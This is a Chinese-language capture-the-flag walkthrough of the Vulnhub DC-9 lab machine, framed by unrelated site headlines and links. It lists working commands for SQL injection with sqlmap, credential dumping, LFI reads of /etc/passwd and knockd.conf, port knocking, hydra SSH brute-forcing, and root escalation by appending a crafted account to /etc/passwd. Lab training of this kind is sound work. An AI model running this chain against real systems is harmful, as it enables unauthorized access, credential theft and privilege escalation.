当前位置: 首页 > news >正文

做网站视频手机每太营销咨询

做网站视频手机,每太营销咨询,河南省住房城乡和建设厅网站,光之翼可以做网站吗目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、dirsearch目录探测 2、sqlmap注入测试 3、文件包含漏洞 4、Knockd敲门服务 5、ssh爆破 ​​​​​​​6、提权 四、提取flag 一、环境搭建 Vulnhub靶机下载#xff1a; 官网地址#xff1a;https://… 目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、dirsearch目录探测 2、sqlmap注入测试 3、文件包含漏洞 4、Knockd敲门服务 5、ssh爆破 ​​​​​​​6、提权 四、提取flag 一、环境搭建 Vulnhub靶机下载 官网地址https://download.vulnhub.com/dc/DC-9.zip 虚拟机VM虚拟机 或者VBOX 导入即可  网络环境NAT 介绍vulnhub是个提供各种漏洞平台的综合靶场拿到root权限才可以发现最终的flag。 二、信息收集 1、主机发现 nmap -sP 192.168.176.0/24  查看服务 nmap -A -p- -v 192.168.176.145 进入网站192.168.176.145 2、指纹识别  whatweb http://192.168.176.145/  没有发现有用信息 三、漏洞复现 1、dirsearch目录探测 dirsearch -u http://192.168.176.145/ -e php  -x 400,404,503,403                                           http://192.168.176.145/manage.php 后台地址 2、sqlmap注入测试 发现搜索页面存在SQL注入 payload1 or 11 # 现在直接使用sqlmap工具来进行SQL注入攻击 sqlmap -u http://192.168.176.145/results.php -data search1 -dbs sqlmap -u http://192.168.176.145/results.php -data search1 -D users -T UserDetails -C username,password -dump 跑出一些账号密码信息 保存一下  密码如下 | username  | password      | -------------------------- | marym     | 3kfs86sfd     | | julied    | 468sfdfsd2    | | fredf     | 4sfd87sfd1    | | barneyr   | RocksOff      | | tomc      | TCTheBoyz    | | jerrym    | B8m#48sd      | | wilmaf    | Pebbles       | | bettyr    | BamBam01      | | chandlerb | UrAG0D! | | joeyt     | Passw0rd      | | rachelg   | yN72#dsd      | | rossg     | ILoveRachel   | | monicag   | 3248dsds7s    | | phoebeb   | smellycats    | | scoots    | YR3BVxxxw87   | | janitor   | Ilovepeepee   | | janitor2  | Hawaii-Five-0 |再跑另外一个看一下 sqlmap -u http://192.168.176.145/results.php -data search1 -D Staff -T StaffDetails -dump sqlmap -u http://192.168.176.145/results.php -data search1 -D Staff -T Users -C Password,Username -dump 856f5de590ef37314e7c3bdf6f8a66dc | admin  这里跑出一个admin账号密码是md5加密 也可以输入yes sqlmap自带的库碰撞 MD5免费在线解密破解_MD5在线加密-SOMD5  在线解密网站成功拿下 密码transorbital1 3、文件包含漏洞 看了半天只看到这个关键词 存在文件包含漏洞 http://192.168.176.145/manage.php/?file//../../../../etc/passwd 到这里 没思路了 上网看了一下思路 回头看 上面nmap扫描的这个22/tcp filtered ssh # 系统默认开放的但是通过策略关掉了因为被策略保护 处于关闭状态Knockd隐藏SSH 但是这里给出的用户密码信息 应该是可以 爆破一下ssh 4、Knockd敲门服务 4.1.利用LFI看看konckd的配置文件可以fuzz一下/etc 目录一般的配置文件都这个目录里。 payloadfile../../../../../etc/knockd.conf [options] UseSyslog [openSSH] sequence  7469,8475,9842 seq_timeout  25 command  /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags  syn [closeSSH] sequence  9842,8475,7469 seq_timeout  25 command  /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags  syn ​​​​​​​​​​​​​​找到了 特定的端口信息746984759842,按顺序敲敲门 4.2.nmap开启敲门 第一种方法 nmap -p 7469 192.168.176.145 nmap -p 8475 192.168.176.145 nmap -p 9842 192.168.176.145 第二种方法 for x in 7469 8475 9842; do nc 192.168.176.145 $x;done 4.3.现在重新nmap扫描服务看看 直接打开了  nmap -A -p- -v 192.168.176.145 ​​​​​​​5、ssh爆破 5.1.前面sqlmap跑的一个表 整理成字典 5.2.hy爆破 hydra -L username.txt mark -P pass.txt ssh://192.168.176.145    跑出了两个账户 login: joeyt   password: Passw0rd                                                                                                      login: janitor   password: Ilovepeepee ssh joeyt192.168.176.145 -p 22 ssh连接 在janitor用户发现了一个隐藏的文件夹  cd .secrets-for-putin ls -a 存在一些密码写入密码字典继续爆破 之前没有出来的那些账号 5.3.ssh连接fredf login: fredf   password: B4-Tru3-001 ​​​​​​​6、提权 接下来提权  查看有无sudo -l权限  sudo -l 发现fredf可以以root的身份执行 (root) NOPASSWD: /opt/devstuff/dist/test/test 是一个python文件 文件的意思是读取第一个文件追加到第二个文件上 利用find指令找到这个python文件 命令 find / -name test.py 2/dev/null 寻找叫做test.py的文件 接着在/opt/devstuff/发现python源文件test.py 代码如下 import sys if len (sys.argv) ! 3 :print (Usage: python test.py read append)sys.exit (1) else :f  open(sys.argv[1], r)output  (f.read())f  open(sys.argv[2], a)f.write(output)f.close()这是一个可以写入文件的一个python程序,我们可以以root权限写入任意一个文件 所以我们接下来要以root权限在/etc/passwd中写入一个具有root权限的用户 因为在/etc/passwd中的密码都是加密过的我们也要设计一个加密的密码 设置密码命令 openssl passwd -1(md5加密算法) -salt用一个随机数去加盐 admin 123456 openssl passwd -1 -salt admin 123456  生成密码$1$admin$LClYcRe.ee8dQwgrFc5nz. 先把这些写入临时文件再用test.py读取文件追加到passwd里面 1、写入临时文件 echo admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:/root:/bin/bash /tmp/mm 2、python程序追加到etc/passwd sudo ./test /tmp/mm.txt  /etc/passwd 3、切换用户看看 su admin 4、交互式shell python -c import pty;pty.spawn(/bin/bash) 四、提取flag
http://www.w-s-a.com/news/380635/

相关文章:

  • 百度关键词优化软件如何wordpress站点地图优化
  • 使用cnnic证书的网站营销公司有哪些
  • 做电子杂志用什么网站如何将网站生成二维码
  • 三点水网站建设洛阳市建设厅网站
  • 哪家做网站便宜网络推广培训吧
  • 网站怎么做支付非凡软件站
  • 北京谁会做网站开发熊岳网站怎么做
  • 南阳哪有做网站公司定制网站本地企业
  • 平板上做网站的软件邀约网站怎么做请柬
  • 企业网站成品源码邯郸做网站流程
  • 建设网站需要什么技术两个网站放在同一个服务器 备案
  • 焦作做网站推广天津网络关键词排名
  • siteserver cms网站访问量挂机宝可以做网站吗
  • 普宁网站建设公司网络商城设计
  • wordpress主题 外贸网站wordpress安装后输入帐号登不进去
  • 陕西省西安市建设局网站永登网站设计与建设
  • 广东网站设计招工.免费咨询贷款
  • 做试题网站在线做c 题的网站
  • 青岛发现51例阳性南京专业网站优化公司
  • 南昌建站如何上wordpress
  • 洛阳网站建设优惠公司建筑企业上市公司有哪些
  • 营销型网站建设营销型网站建设手机网站设计需要学什么
  • 在线视频网站 一级做爰片南通网站建设找哪家
  • 网站优化文章东莞专业网站建设价钱
  • 哈尔滨网页设计网站模板泰兴建设局网站
  • 响应式网站设计公司报纸做垂直门户网站
  • 陕西旭泽建设有限公司网站企业网站建设软件需求分析
  • 上海公司网站建设方案中企动力西安分公司
  • dedecms网站后台怎样才能上百度
  • 云互联的网站名字亚马逊雨林生物